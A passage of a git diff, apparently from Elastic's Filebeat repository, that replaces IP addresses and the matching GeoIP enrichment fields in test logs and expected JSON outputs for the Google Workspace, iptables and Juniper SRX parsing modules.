+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -23,23 +23,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -60,7 +56,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -72,26 +68,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 316,
+        "log.offset": 315,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -112,7 +104,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -124,26 +116,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 631,
+        "log.offset": 629,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -164,7 +152,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -176,26 +164,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 954,
+        "log.offset": 951,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -216,7 +200,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -228,26 +212,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1288,
+        "log.offset": 1284,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -268,7 +248,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -280,26 +260,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1622,
+        "log.offset": 1617,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -320,7 +296,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -332,26 +308,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1960,
+        "log.offset": 1954,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -372,7 +344,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
         "event.provider": "user_accounts",
         "event.type": [
             "change",
@@ -384,26 +356,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2285,
+        "log.offset": 2278,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/iptables/log/test/geo.log b/x-pack/filebeat/module/iptables/log/test/geo.log
index 1755a7853c00..49efd47de0c0 100644
--- a/x-pack/filebeat/module/iptables/log/test/geo.log
+++ b/x-pack/filebeat/module/iptables/log/test/geo.log
@@ -1 +1 @@
-Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 
+Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=175.16.199.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 
diff --git a/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json b/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
index 6066210c9ff0..6228539b93a7 100644
--- a/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
+++ b/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
@@ -10,7 +10,7 @@
         "event.dataset": "iptables.log",
         "event.kind": "event",
         "event.module": "iptables",
-        "event.original": "Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 ",
+        "event.original": "Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=175.16.199.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 ",
         "event.timezone": "-02:00",
         "event.type": [
             "connection",
@@ -39,7 +39,7 @@
         "iptables.ubiquiti.rule_number": "default",
         "iptables.ubiquiti.rule_set": "wan-lan",
         "log.offset": 0,
-        "network.community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=",
+        "network.community_id": "1:3Mqu8u+9tDyi16P1h2Wlxw1ll98=",
         "network.transport": "tcp",
         "network.type": "ipv4",
         "observer.egress.zone": "lan",
@@ -47,19 +47,20 @@
         "observer.name": "Hostname",
         "related.ip": [
             "10.4.0.5",
-            "158.109.0.1"
+            "175.16.199.1"
         ],
         "rule.id": "default",
         "rule.name": "wan-lan",
         "service.type": "iptables",
-        "source.as.number": 13041,
-        "source.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4172,
-        "source.geo.location.lon": -3.684,
-        "source.ip": "158.109.0.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.mac": "90:10:65:29:b6:2a",
         "source.port": 38842,
         "tags": [
diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log b/x-pack/filebeat/module/juniper/srx/test/atp.log
index 95c8210f038a..cf6d3bb7aa39 100644
--- a/x-pack/filebeat/module/juniper/srx/test/atp.log
+++ b/x-pack/filebeat/module/juniper/srx/test/atp.log
@@ -1,4 +1,4 @@
 <14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="187.19.188.200" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
 <14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.0.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
 <11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.0.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
-<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="1.1.1.1" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
+<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.81.2.69.144.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="89.160.20.156" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
index 5c788135621d..0134b507169e 100644
--- a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
@@ -3,16 +3,6 @@
         "@timestamp": "2013-12-14T14:06:59.134-02:00",
         "client.ip": "10.10.10.1",
         "client.port": 57116,
-        "destination.as.number": 28126,
-        "destination.as.organization.name": "BRISANET SERVICOS DE TELECOMUNICACOES LTDA",
-        "destination.geo.city_name": "Juazeiro do Norte",
-        "destination.geo.continent_name": "South America",
-        "destination.geo.country_iso_code": "BR",
-        "destination.geo.country_name": "Brazil",
-        "destination.geo.location.lat": -7.1467,
-        "destination.geo.location.lon": -39.247,
-        "destination.geo.region_iso_code": "BR-CE",
-        "destination.geo.region_name": "Ceara",
         "destination.ip": "187.19.188.200",
         "destination.port": 80,
         "event.action": "malware_detected",
@@ -176,7 +166,7 @@
     },
     {
         "@timestamp": "2007-02-15T07:17:15.719-02:00",
-        "client.ip": "1.1.1.1",
+        "client.ip": "89.160.20.156",
         "client.port": 60148,
         "destination.ip": "10.0.0.1",
         "destination.port": 80,
@@ -186,7 +176,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"1.1.1.1\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"",
+        "event.original": "hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"89.160.20.156\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"",
         "event.outcome": "success",
         "event.severity": 165,
         "event.timezone": "-02:00",
@@ -222,21 +212,24 @@
             "dummy_host"
         ],
         "related.ip": [
-            "1.1.1.1",
-            "10.0.0.1"
+            "10.0.0.1",
+            "89.160.20.156"
         ],
         "server.ip": "10.0.0.1",
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
         "source.domain": "dummy_host",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.1",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 60148,
         "tags": [
             "forwarded",
diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log b/x-pack/filebeat/module/juniper/srx/test/flow.log
index 400bceceeeef..89c8b63e546b 100644
--- a/x-pack/filebeat/module/juniper/srx/test/flow.log
+++ b/x-pack/filebeat/module/juniper/srx/test/flow.log
@@ -1,25 +1,25 @@
-<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
-<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
-<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="1.2.3.4" source-port="56639" destination-address="5.6.7.8" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "]
